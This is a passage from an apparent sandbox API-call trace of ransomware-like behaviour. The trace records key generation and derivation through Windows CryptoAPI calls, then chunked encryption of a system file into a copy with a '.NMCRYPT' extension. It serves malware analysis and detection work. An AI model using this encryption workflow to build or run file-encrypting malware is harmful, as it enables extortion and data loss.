(in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.673] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0153.674] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0153.674] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0153.674] CryptHashData (hHash=0x9ad3b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.674] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad3b8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad1b8) returned 1 [0153.674] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0153.674] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0153.674] wcslen (_String="\\\\?\\") returned 0x4 [0153.674] CryptDuplicateKey (in: hKey=0x9ad1b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad2f8) returned 1 [0153.674] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0153.674] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0153.675] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=4096) returned 1 [0153.675] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0153.675] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.676] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.676] GetLastError () returned 0x0 [0153.676] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.684] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.685] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.685] GetLastError () returned 0x0 [0153.685] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.685] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.685] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.685] GetLastError () returned 0x0 [0153.685] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.685] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.685] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.685] GetLastError () returned 0x0 [0153.685] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.685] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.685] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.685] GetLastError () returned 0x0 [0153.685] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.685] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.685] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.685] GetLastError () returned 0x0 [0153.685] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.685] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.685] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.685] GetLastError () returned 0x0 [0153.685] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.685] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.685] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.686] GetLastError () returned 0x0 [0153.686] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.686] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.686] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.686] GetLastError () returned 0x0 [0153.686] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.686] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.686] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.686] GetLastError () returned 0x0 [0153.686] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.686] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.686] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.686] GetLastError () returned 0x0 [0153.686] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.686] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.686] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.686] GetLastError () returned 0x0 [0153.686] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.686] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.686] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.686] GetLastError () returned 0x0 [0153.686] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.686] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.686] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.686] GetLastError () returned 0x0 [0153.686] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.687] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.687] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | 